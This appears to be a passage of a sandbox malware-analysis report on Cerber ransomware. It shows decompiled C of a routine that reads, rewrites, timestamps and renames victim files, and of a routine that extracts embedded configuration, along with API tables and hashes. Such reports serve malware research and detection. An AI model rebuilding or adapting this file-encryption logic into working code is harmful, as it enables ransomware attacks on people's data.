                                                                                                                                                                                        						_v9 = 0;
                                                                                                                                                                                        						_v24 = _t259;
                                                                                                                                                                                        						_t281 = _t160 - _v60;
                                                                                                                                                                                        						if(_t281 < 0 || _t281 <= 0 && _v96.dwLowDateTime <= _v64) {
                                                                                                                                                                                        							_t251 = _t229 & 0x0000ffff;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							_t247 =  *0x42f7b8; // 0x0
                                                                                                                                                                                        							asm("sbb eax, [ebp-0x38]");
                                                                                                                                                                                        							_t242 = _t229 - _v64 - 0x42f7c0->LowPart;
                                                                                                                                                                                        							_t251 =  *0x42f7b4 & 0x0000ffff;
                                                                                                                                                                                        							asm("sbb eax, [0x42f7c4]");
                                                                                                                                                                                        							_v24 = _t247;
                                                                                                                                                                                        							_t283 = _t160 - _t259;
                                                                                                                                                                                        							if(_t283 <= 0 && (_t283 < 0 || _t242 < _t247)) {
                                                                                                                                                                                        								_v24 = _t242;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_v9 = 1;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t161 = _v28;
                                                                                                                                                                                        						if(_t161 != _t259 || _v9 == 0) {
                                                                                                                                                                                        							if(_v9 != 0) {
                                                                                                                                                                                        								 *_t161 = _t259;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							GetFileTime(_v20,  &_v80,  &_v88,  &_v96);
                                                                                                                                                                                        							_push(_t259);
                                                                                                                                                                                        							_v36 = ( *0x42f7a4 & 0x0000ffff) + _t225 + 0x17;
                                                                                                                                                                                        							SetFilePointerEx(_v20, 0x42f7c0->LowPart,  *0x42f7c4, _t259);
                                                                                                                                                                                        							_t169 = _t251 & 0x0000ffff;
                                                                                                                                                                                        							_v32 = _t169;
                                                                                                                                                                                        							ReadFile(_v20, _v36, _t169,  &_v60, _t259);
                                                                                                                                                                                        							 *((char*)(_t225 + 8)) = _v9;
                                                                                                                                                                                        							 *((intOrPtr*)(_t225 + 9)) = _v24;
                                                                                                                                                                                        							_t173 = 0x42f7c0->LowPart; // 0x0
                                                                                                                                                                                        							 *((short*)(_t225 + 0xf)) = _t173;
                                                                                                                                                                                        							 *(_t225 + 6) = lstrlenW(_a12) + _t174;
                                                                                                                                                                                        							 *(_t225 + 0xd) = _t251;
                                                                                                                                                                                        							 *((intOrPtr*)(_t225 + 0x11)) = E0040AF39( &_v60, _v32);
                                                                                                                                                                                        							_v36 = _t225 + 0x17;
                                                                                                                                                                                        							E00404B6E(_t225 + 0x17,  *0x42f7a4 & 0x0000ffff);
                                                                                                                                                                                        							_t233 =  *(_t225 + 6) & 0x0000ffff;
                                                                                                                                                                                        							_v44 = ( *(_t225 + 6) & 0x0000ffff) + 0x18 + (_v9 & 0x000000ff) * 8;
                                                                                                                                                                                        							_t254 = E004053BD( *(_t225 + 6) & 0x0000ffff);
                                                                                                                                                                                        							_v52 = _t254;
                                                                                                                                                                                        							_t288 = _t254 - _t259;
                                                                                                                                                                                        							if(_t254 != _t259) {
                                                                                                                                                                                        								 *((intOrPtr*)(_t254 + 4)) = _v80.dwHighDateTime;
                                                                                                                                                                                        								 *_t254 = _v80.dwLowDateTime;
                                                                                                                                                                                        								 *((intOrPtr*)(_t254 + 0xc)) = _v88.dwHighDateTime;
                                                                                                                                                                                        								 *(_t254 + 8) = _v88.dwLowDateTime;
                                                                                                                                                                                        								 *((intOrPtr*)(_t254 + 0x14)) = _v96.dwHighDateTime;
                                                                                                                                                                                        								 *(_t254 + 0x10) = _v96.dwLowDateTime;
                                                                                                                                                                                        								_t88 = _t254 + 0x18; // 0x18
                                                                                                                                                                                        								memcpy(_t88, _a12,  *(_t225 + 6) & 0x0000ffff);
                                                                                                                                                                                        								_t191 =  *0x42f794; // 0x0
                                                                                                                                                                                        								_v48 = _t191;
                                                                                                                                                                                        								_t193 = E0040B283(_t233, _t288,  *0x42f7bc, _t225,  &_v48);
                                                                                                                                                                                        								_v56 = _t193;
                                                                                                                                                                                        								if(_t193 != _t259) {
                                                                                                                                                                                        									_v100 = _v100 & 0x00000000;
                                                                                                                                                                                        									asm("cdq");
                                                                                                                                                                                        									asm("adc eax, edx");
                                                                                                                                                                                        									asm("adc eax, [0x42f7c4]");
                                                                                                                                                                                        									if(E0040194B(_v20, _v36, _v24, _a20, _v28,  *_v28 * _v24 + _v32 + 0x42f7c0->LowPart, _v100) != 0) {
                                                                                                                                                                                        										_t200 =  *(_t225 + 6) & 0x0000ffff;
                                                                                                                                                                                        										_t238 = _v28;
                                                                                                                                                                                        										 *((intOrPtr*)(_t254 + 0x18 + _t200)) =  *_t238;
                                                                                                                                                                                        										 *((intOrPtr*)(_t200 + _t254 + 0x1c)) =  *((intOrPtr*)(_t238 + 4));
                                                                                                                                                                                        										E0040AFFE( *0x42f7a4 & 0x0000ffff, _v44, _v36, _t254, _t259);
                                                                                                                                                                                        										_t226 = _v20;
                                                                                                                                                                                        										_push(_t259);
                                                                                                                                                                                        										SetFilePointerEx(_t226,  *0x42f7c0,  *0x42f7c4, _t259);
                                                                                                                                                                                        										_t256 = _a16;
                                                                                                                                                                                        										E00404B6E(_t256, _v32);
                                                                                                                                                                                        										WriteFile(_t226, _t256, _v32,  &_v24, _t259);
                                                                                                                                                                                        										_push(2);
                                                                                                                                                                                        										_v40 = _t259;
                                                                                                                                                                                        										asm("stosd");
                                                                                                                                                                                        										_t120 =  &_v40; // 0x40237c
                                                                                                                                                                                        										SetFilePointerEx(_t226,  *_t120, _v36, _t259);
                                                                                                                                                                                        										WriteFile(_t226, _v52, _v44,  &_v24, _t259);
                                                                                                                                                                                        										WriteFile(_t226, _v56, _v48,  &_v24, _t259);
                                                                                                                                                                                        										WriteFile(_t226,  *0x42f7b0,  *0x42f7a0,  &_v24, _t259);
                                                                                                                                                                                        										_t254 = _v52;
                                                                                                                                                                                        										_v10 = 1;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									E00405463(_v56);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								E00405463(_t254);
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						E00405463(_v28);
                                                                                                                                                                                        						_t259 = 0;
                                                                                                                                                                                        						goto L27;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                        					L5:
                                                                                                                                                                                        					E00405463(_v16);
                                                                                                                                                                                        					_v16 = _v16 & 0x00000000;
                                                                                                                                                                                        					_v128 = 0;
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosw");
                                                                                                                                                                                        					E00405D99(_t228, _t243,  &_v128, 0xb, 0xf);
                                                                                                                                                                                        					_push(0x42fe98);
                                                                                                                                                                                        					_push( &_v128);
                                                                                                                                                                                        					_push(_a8);
                                                                                                                                                                                        					_push(E0040591C(0x40d064, 8, 0xf9a13d54));
                                                                                                                                                                                        					_push( &_v16);
                                                                                                                                                                                        					E00405B0C(_t225, _t228,  &_v126, _v16, _t278);
                                                                                                                                                                                        					_t268 = _t268 + 0x2c;
                                                                                                                                                                                        					_t223 = E00404EA5(_v16);
                                                                                                                                                                                        					_pop(_t228);
                                                                                                                                                                                        					if(_t223 != 0) {
                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_t259 = 0;
                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t277 = _v72 -  *0x42f7a8; // 0x0
                                                                                                                                                                                        				if(_t277 < 0) {
                                                                                                                                                                                        					goto L27;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                        			}
                                                                                                                                                                                        0x00401bfc
                                                                                                                                                                                        0x00401bc7
                                                                                                                                                                                        0x00401bca
                                                                                                                                                                                        0x00401bd0
                                                                                                                                                                                        0x00401bd3
                                                                                                                                                                                        0x00401bd9
                                                                                                                                                                                        0x00401be0
                                                                                                                                                                                        0x00401be6
                                                                                                                                                                                        0x00401be9
                                                                                                                                                                                        0x00401beb
                                                                                                                                                                                        0x00401bf3
                                                                                                                                                                                        0x00401bf3
                                                                                                                                                                                        0x00401bf6
                                                                                                                                                                                        0x00401bf6
                                                                                                                                                                                        0x00401bff
                                                                                                                                                                                        0x00401c04
                                                                                                                                                                                        0x00401c14
                                                                                                                                                                                        0x00401c16
                                                                                                                                                                                        0x00401c16
                                                                                                                                                                                        0x00401c27
                                                                                                                                                                                        0x00401c34
                                                                                                                                                                                        0x00401c46
                                                                                                                                                                                        0x00401c4c
                                                                                                                                                                                        0x00401c53
                                                                                                                                                                                        0x00401c5e
                                                                                                                                                                                        0x00401c64
                                                                                                                                                                                        0x00401c70
                                                                                                                                                                                        0x00401c76
                                                                                                                                                                                        0x00401c79
                                                                                                                                                                                        0x00401c7f
                                                                                                                                                                                        0x00401c91
                                                                                                                                                                                        0x00401c95
                                                                                                                                                                                        0x00401c9e
                                                                                                                                                                                        0x00401cad
                                                                                                                                                                                        0x00401cb0
                                                                                                                                                                                        0x00401cba
                                                                                                                                                                                        0x00401cc2
                                                                                                                                                                                        0x00401cca
                                                                                                                                                                                        0x00401ccc
                                                                                                                                                                                        0x00401ccf
                                                                                                                                                                                        0x00401cd1
                                                                                                                                                                                        0x00401cda
                                                                                                                                                                                        0x00401ce0
                                                                                                                                                                                        0x00401ce5
                                                                                                                                                                                        0x00401ceb
                                                                                                                                                                                        0x00401cf1
                                                                                                                                                                                        0x00401cf7
                                                                                                                                                                                        0x00401d02
                                                                                                                                                                                        0x00401d06
                                                                                                                                                                                        0x00401d0b
                                                                                                                                                                                        0x00401d13
                                                                                                                                                                                        0x00401d21
                                                                                                                                                                                        0x00401d29
                                                                                                                                                                                        0x00401d2e
                                                                                                                                                                                        0x00401d40
                                                                                                                                                                                        0x00401d44
                                                                                                                                                                                        0x00401d4a
                                                                                                                                                                                        0x00401d52
                                                                                                                                                                                        0x00401d73
                                                                                                                                                                                        0x00401d79
                                                                                                                                                                                        0x00401d7d
                                                                                                                                                                                        0x00401d82
                                                                                                                                                                                        0x00401d8a
                                                                                                                                                                                        0x00401d9c
                                                                                                                                                                                        0x00401da1
                                                                                                                                                                                        0x00401da7
                                                                                                                                                                                        0x00401db6
                                                                                                                                                                                        0x00401dbf
                                                                                                                                                                                        0x00401dc2
                                                                                                                                                                                        0x00401dd2
                                                                                                                                                                                        0x00401dd8
                                                                                                                                                                                        0x00401ddd
                                                                                                                                                                                        0x00401de3
                                                                                                                                                                                        0x00401de7
                                                                                                                                                                                        0x00401deb
                                                                                                                                                                                        0x00401dfd
                                                                                                                                                                                        0x00401e0f
                                                                                                                                                                                        0x00401e27
                                                                                                                                                                                        0x00401e2d
                                                                                                                                                                                        0x00401e30
                                                                                                                                                                                        0x00401e30
                                                                                                                                                                                        0x00401e37
                                                                                                                                                                                        0x00401e37
                                                                                                                                                                                        0x00401e3e
                                                                                                                                                                                        0x00401e3e
                                                                                                                                                                                        0x00401cd1
                                                                                                                                                                                        0x00401e46
                                                                                                                                                                                        0x00401e4b
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00401b22
                                                                                                                                                                                        0x00401b25
                                                                                                                                                                                        0x00401b2c
                                                                                                                                                                                        0x00401b30
                                                                                                                                                                                        0x00401b37
                                                                                                                                                                                        0x00401b38
                                                                                                                                                                                        0x00401b39
                                                                                                                                                                                        0x00401b3a
                                                                                                                                                                                        0x00401b3b
                                                                                                                                                                                        0x00401b3e
                                                                                                                                                                                        0x00401b46
                                                                                                                                                                                        0x00401b4e
                                                                                                                                                                                        0x00401b56
                                                                                                                                                                                        0x00401b57
                                                                                                                                                                                        0x00401b6e
                                                                                                                                                                                        0x00401b72
                                                                                                                                                                                        0x00401b73
                                                                                                                                                                                        0x00401b78
                                                                                                                                                                                        0x00401b7e
                                                                                                                                                                                        0x00401b83
                                                                                                                                                                                        0x00401b86
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00401b88
                                                                                                                                                                                        0x00401b88
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00401b88
                                                                                                                                                                                        0x00401b86
                                                                                                                                                                                        0x00401ab1
                                                                                                                                                                                        0x00401ab7
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?), ref: 00401A80
                                                                                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 00401A97
                                                                                                                                                                                        • GetFileTime.KERNEL32(?,?,?,?), ref: 00401C27
                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(?,00000000,00000000), ref: 00401C4C
                                                                                                                                                                                        • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00401C64
                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00401C83
                                                                                                                                                                                        • memcpy.NTDLL(00000018,?,?), ref: 00401D06
                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(?,00000000,00000000), ref: 00401DB6
                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401DD2
                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(?,|#@,?,00000000,00000002), ref: 00401DEB
                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401DFD
                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401E0F
                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000), ref: 00401E27
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00401E50
                                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00401E67
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$Write$Pointer$CloseCreateHandleMoveReadSizeTimelstrlenmemcpy
                                                                                                                                                                                        • String ID: |#@
                                                                                                                                                                                        • API String ID: 2810646288-1793031895
                                                                                                                                                                                        • Opcode ID: 81c840d88c8de1d83fb7e166e0f123c82ea515b37ff8992445bab9daa1ce9efb
                                                                                                                                                                                        • Instruction ID: 03c0d9b36c0c9c4c583867d549d6c9e758735e5455f2e97db342a84e4f9e9e08
                                                                                                                                                                                        • Opcode Fuzzy Hash: 81c840d88c8de1d83fb7e166e0f123c82ea515b37ff8992445bab9daa1ce9efb
                                                                                                                                                                                        • Instruction Fuzzy Hash: 04D13776D00118AFCB11DFA4DD45AAEBBB9FF48700F50407AF900B72A1D735A955CBA8
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                        			E00406C8C(intOrPtr _a4) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                        				DWORD* _v16;
                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                        				char _v56;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                        				void* _t72;
                                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                                        				intOrPtr _t79;
                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                        				signed int _t82;
                                                                                                                                                                                        				void* _t97;
                                                                                                                                                                                        				void* _t101;
                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                        				char* _t108;
                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                        				long _t117;
                                                                                                                                                                                        				intOrPtr* _t120;
                                                                                                                                                                                        				void* _t122;
                                                                                                                                                                                        				signed int _t127;
                                                                                                                                                                                        				signed int _t130;
                                                                                                                                                                                        				void* _t135;
                                                                                                                                                                                        				DWORD* _t138;
                                                                                                                                                                                        				signed int _t139;
                                                                                                                                                                                        				signed int _t140;
                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                        				void* _t147;
                                                                                                                                                                                        				void* _t148;
                                                                                                                                                                                        				signed int _t150;
                                                                                                                                                                                        				signed int _t152;
                                                                                                                                                                                        				void* _t153;
                                                                                                                                                                                        				void* _t154;
                                                                                                                                                                                        				void* _t156;
                                                                                                                                                                                        				void* _t157;
                                                                                                                                                                                        				signed int _t187;
                                                                                                                                                                                        				void* _t189;
                                                                                                                                                                                        				void* _t190;
                                                                                                                                                                                        				intOrPtr _t191;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_t70 = CreateFileW(0x42f840, 0x80000000, 1, 0, 3, 0, 0);
                                                                                                                                                                                        				_v20 = _t70;
                                                                                                                                                                                        				if(_t70 == 0xffffffff) {
                                                                                                                                                                                        					L13:
                                                                                                                                                                                        					_t148 = CreateFileW(0x42f840, 0x80000000, 1, 0, 3, 0, 0);
                                                                                                                                                                                        					_v16 = _t148;
                                                                                                                                                                                        					if(_t148 != 0xffffffff) {
                                                                                                                                                                                        						_t101 = CreateFileMappingW(_t148, 0, 2, 0, 0, 0);
                                                                                                                                                                                        						_v20 = _t101;
                                                                                                                                                                                        						if(_t101 != 0) {
                                                                                                                                                                                        							_t146 = MapViewOfFile(_t101, 4, 0, 0, 0);
                                                                                                                                                                                        							if(_t146 != 0) {
                                                                                                                                                                                        								_t106 = GetFileSize(_t148, 0) + 0xfffffef6;
                                                                                                                                                                                        								_t153 = 0;
                                                                                                                                                                                        								_v24 = _t106;
                                                                                                                                                                                        								if(_t106 > 0) {
                                                                                                                                                                                        									do {
                                                                                                                                                                                        										_t108 = _t153 + _t146;
                                                                                                                                                                                        										if( *_t108 != 0x4c ||  *((char*)(_t153 + _t146 + 1)) != 0x82 ||  *((char*)(_t153 + _t146 + 2)) != 0xf3 ||  *((char*)(_t153 + _t146 + 3)) != 0x75 ||  *((char*)(_t153 + _t146 + 4)) != 0xf9 ||  *((char*)(_t153 + _t146 + 5)) != 0x76 ||  *((char*)(_t153 + _t146 + 6)) != 0x1f ||  *((char*)(_t153 + _t146 + 7)) != 0x51 ||  *((char*)(_t153 + _t146 + 8)) != 0xa) {
                                                                                                                                                                                        											goto L28;
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											_t183 =  *((char*)(_t153 + _t146 + 9)) - 0xc6;
                                                                                                                                                                                        											if( *((char*)(_t153 + _t146 + 9)) != 0xc6) {
                                                                                                                                                                                        												goto L28;
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												_push(_a4);
                                                                                                                                                                                        												_t47 = _t108 + 0x10a; // -4294966764
                                                                                                                                                                                        												_t153 = _t153 + 0xa;
                                                                                                                                                                                        												if(E00406A35(0, _t47, _t139, _t146, _t153, _t183) == 0) {
                                                                                                                                                                                        													goto L28;
                                                                                                                                                                                        												}
                                                                                                                                                                                        											}
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L29;
                                                                                                                                                                                        										L28:
                                                                                                                                                                                        										_t153 = _t153 + 1;
                                                                                                                                                                                        										_t185 = _t153 - _v24;
                                                                                                                                                                                        									} while (_t153 < _v24);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								L29:
                                                                                                                                                                                        								UnmapViewOfFile(_t146);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							CloseHandle(_v20);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						CloseHandle(_v16);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t110 = CreateFileMappingW(_t70, 0, 2, 0, 0, 0);
                                                                                                                                                                                        					_v24 = _t110;
                                                                                                                                                                                        					if(_t110 != 0) {
                                                                                                                                                                                        						_t147 = MapViewOfFile(_t110, 4, 0, 0, 0);
                                                                                                                                                                                        						if(_t147 != 0) {
                                                                                                                                                                                        							_t115 =  *((intOrPtr*)(_t147 + 0x3c)) + _t147;
                                                                                                                                                                                        							_t139 =  *(_t115 + 6) & 0x0000ffff;
                                                                                                                                                                                        							_t135 = ( *(_t115 + 0x14) & 0x0000ffff) + _t115 + 0x18;
                                                                                                                                                                                        							_t154 = 0;
                                                                                                                                                                                        							_v16 = 0;
                                                                                                                                                                                        							if(0 < _t139) {
                                                                                                                                                                                        								_t120 = _t135 + 0x14;
                                                                                                                                                                                        								_v12 = _t139;
                                                                                                                                                                                        								do {
                                                                                                                                                                                        									_t138 =  *_t120;
                                                                                                                                                                                        									if(_t138 > _v16) {
                                                                                                                                                                                        										_v16 = _t138;
                                                                                                                                                                                        										_t154 =  *((intOrPtr*)(_t120 - 4)) + _t138;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t120 = _t120 + 0x28;
                                                                                                                                                                                        									_t15 =  &_v12;
                                                                                                                                                                                        									 *_t15 = _v12 - 1;
                                                                                                                                                                                        								} while ( *_t15 != 0);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t117 = GetFileSize(_v20, 0);
                                                                                                                                                                                        							_t168 = _t117 - _t154;
                                                                                                                                                                                        							if(_t117 > _t154) {
                                                                                                                                                                                        								_push(_a4);
                                                                                                                                                                                        								_v5 = E00406A35(0, _t147 + _t117, _t139, _t147, _t154, _t168);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							UnmapViewOfFile(_t147);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						CloseHandle(_v24);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					CloseHandle(_v20);
                                                                                                                                                                                        					if(_v5 == 0) {
                                                                                                                                                                                        						goto L13;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t72 = E00405905( &E0040D460, 7, 0xa798abfa);
                                                                                                                                                                                        				_t157 = _t156 + 0xc;
                                                                                                                                                                                        				_t74 = E004031AF(_a4, _t185, _t72);
                                                                                                                                                                                        				_pop(_t122);
                                                                                                                                                                                        				_v16 = _t74;
                                                                                                                                                                                        				if(_t74 != 0) {
                                                                                                                                                                                        					_t187 =  *0x42fa48; // 0x0
                                                                                                                                                                                        					if(_t187 == 0) {
                                                                                                                                                                                        						_t97 = E00405905( &E0040D468, 3, 0xd0d06399);
                                                                                                                                                                                        						_t157 = _t157 + 0xc;
                                                                                                                                                                                        						_t74 = E0040596B(E004032B8(E004031AF(_v16, _t187, _t97), _t187));
                                                                                                                                                                                        						_pop(_t122);
                                                                                                                                                                                        						 *0x42fa48 = _t74;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t140 =  *0x42f83c; // 0x0
                                                                                                                                                                                        					if(_t140 != 0) {
                                                                                                                                                                                        						__eflags =  *0x42fa4c - 5;
                                                                                                                                                                                        						if(__eflags < 0) {
                                                                                                                                                                                        							_t80 = 0x14;
                                                                                                                                                                                        							 *0x42f83c = E004053CA(_t80, _t122, _t140);
                                                                                                                                                                                        							_t74 =  *0x42fa4c; // 0x0
                                                                                                                                                                                        							__eflags = _t74 - 5;
                                                                                                                                                                                        							if(__eflags < 0) {
                                                                                                                                                                                        								_t150 = _t74 << 2;
                                                                                                                                                                                        								_t82 = _t74 + 1;
                                                                                                                                                                                        								__eflags = _t82;
                                                                                                                                                                                        								_v12 = _t82;
                                                                                                                                                                                        								do {
                                                                                                                                                                                        									_push(_v12);
                                                                                                                                                                                        									wsprintfA( &_v56, E00405905( &E0040D46C, 7, 0xc848aec3));
                                                                                                                                                                                        									_t157 = _t157 + 0x18;
                                                                                                                                                                                        									_t74 = E0040596B(E004032B8(E004031AF(_v16, __eflags,  &_v56), __eflags));
                                                                                                                                                                                        									 *0x42fa4c =  *0x42fa4c + 1;
                                                                                                                                                                                        									_v12 = _v12 + 1;
                                                                                                                                                                                        									_t127 =  *0x42f83c; // 0x0
                                                                                                                                                                                        									 *(_t150 + _t127) = _t74;
                                                                                                                                                                                        									_t150 = _t150 + 4;
                                                                                                                                                                                        									__eflags = _v12 - 6;
                                                                                                                                                                                        								} while (__eflags < 0);
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_push(0x14);
                                                                                                                                                                                        						 *0x42fa4c = 5;
                                                                                                                                                                                        						_t74 = E004053B4(_t122);
                                                                                                                                                                                        						_t152 = 1;
                                                                                                                                                                                        						 *0x42f83c = _t74;
                                                                                                                                                                                        						_t189 =  *0x42fa4c - _t152; // 0x0
                                                                                                                                                                                        						if(_t189 >= 0) {
                                                                                                                                                                                        							do {
                                                                                                                                                                                        								_push(_t152);
                                                                                                                                                                                        								wsprintfA( &_v56, E00405905( &E0040D46C, 7, 0xc848aec3));
                                                                                                                                                                                        								_t157 = _t157 + 0x18;
                                                                                                                                                                                        								_t74 = E0040596B(E004032B8(E004031AF(_v16, _t189,  &_v56), _t189));
                                                                                                                                                                                        								_t130 =  *0x42f83c; // 0x0
                                                                                                                                                                                        								 *(_t130 + _t152 * 4 - 4) = _t74;
                                                                                                                                                                                        								_t152 = _t152 + 1;
                                                                                                                                                                                        								_t190 = _t152 -  *0x42fa4c; // 0x0
                                                                                                                                                                                        							} while (_t190 <= 0);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t191 =  *0x42fa50; // 0x0
                                                                                                                                                                                        					if(_t191 == 0) {
                                                                                                                                                                                        						_t79 = E0040596B(E004032B8(E004031AF(_v16, _t191, E00405905(0x40d474, 4, 0x8969c48e)), _t191));
                                                                                                                                                                                        						 *0x42fa50 = _t79;
                                                                                                                                                                                        						return _t79;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t74;
                                                                                                                                                                                        			}
                                                                                                                                                                                        0x00406f34
                                                                                                                                                                                        0x00406f3a
                                                                                                                                                                                        0x00406f3f
                                                                                                                                                                                        0x00406f44
                                                                                                                                                                                        0x00406f47
                                                                                                                                                                                        0x00406f4b
                                                                                                                                                                                        0x00406f4e
                                                                                                                                                                                        0x00406f4e
                                                                                                                                                                                        0x00406f4f
                                                                                                                                                                                        0x00406f52
                                                                                                                                                                                        0x00406f52
                                                                                                                                                                                        0x00406f6e
                                                                                                                                                                                        0x00406f77
                                                                                                                                                                                        0x00406f8c
                                                                                                                                                                                        0x00406f91
                                                                                                                                                                                        0x00406f97
                                                                                                                                                                                        0x00406f9b
                                                                                                                                                                                        0x00406fa1
                                                                                                                                                                                        0x00406fa4
                                                                                                                                                                                        0x00406fa7
                                                                                                                                                                                        0x00406fa7
                                                                                                                                                                                        0x00406f52
                                                                                                                                                                                        0x00406f47
                                                                                                                                                                                        0x00406ead
                                                                                                                                                                                        0x00406ead
                                                                                                                                                                                        0x00406eb0
                                                                                                                                                                                        0x00406eba
                                                                                                                                                                                        0x00406ec1
                                                                                                                                                                                        0x00406ec2
                                                                                                                                                                                        0x00406ec7
                                                                                                                                                                                        0x00406ecd
                                                                                                                                                                                        0x00406ed3
                                                                                                                                                                                        0x00406ed3
                                                                                                                                                                                        0x00406eed
                                                                                                                                                                                        0x00406ef6
                                                                                                                                                                                        0x00406f0b
                                                                                                                                                                                        0x00406f11
                                                                                                                                                                                        0x00406f17
                                                                                                                                                                                        0x00406f1b
                                                                                                                                                                                        0x00406f1c
                                                                                                                                                                                        0x00406f1c
                                                                                                                                                                                        0x00406f24
                                                                                                                                                                                        0x00406ecd
                                                                                                                                                                                        0x00406fad
                                                                                                                                                                                        0x00406fb3
                                                                                                                                                                                        0x00406fdb
                                                                                                                                                                                        0x00406fe1
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00406fe1
                                                                                                                                                                                        0x00406fb3
                                                                                                                                                                                        0x00406fea

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateFileW.KERNEL32(0042F840,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000), ref: 00406CAB
                                                                                                                                                                                        • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00406CC4
                                                                                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00406CD7
                                                                                                                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 00406D21
                                                                                                                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00406D3B
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406D44
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406D4D
                                                                                                                                                                                        • CreateFileW.KERNEL32(0042F840,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D6D
                                                                                                                                                                                        • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00406D88
                                                                                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00406D9F
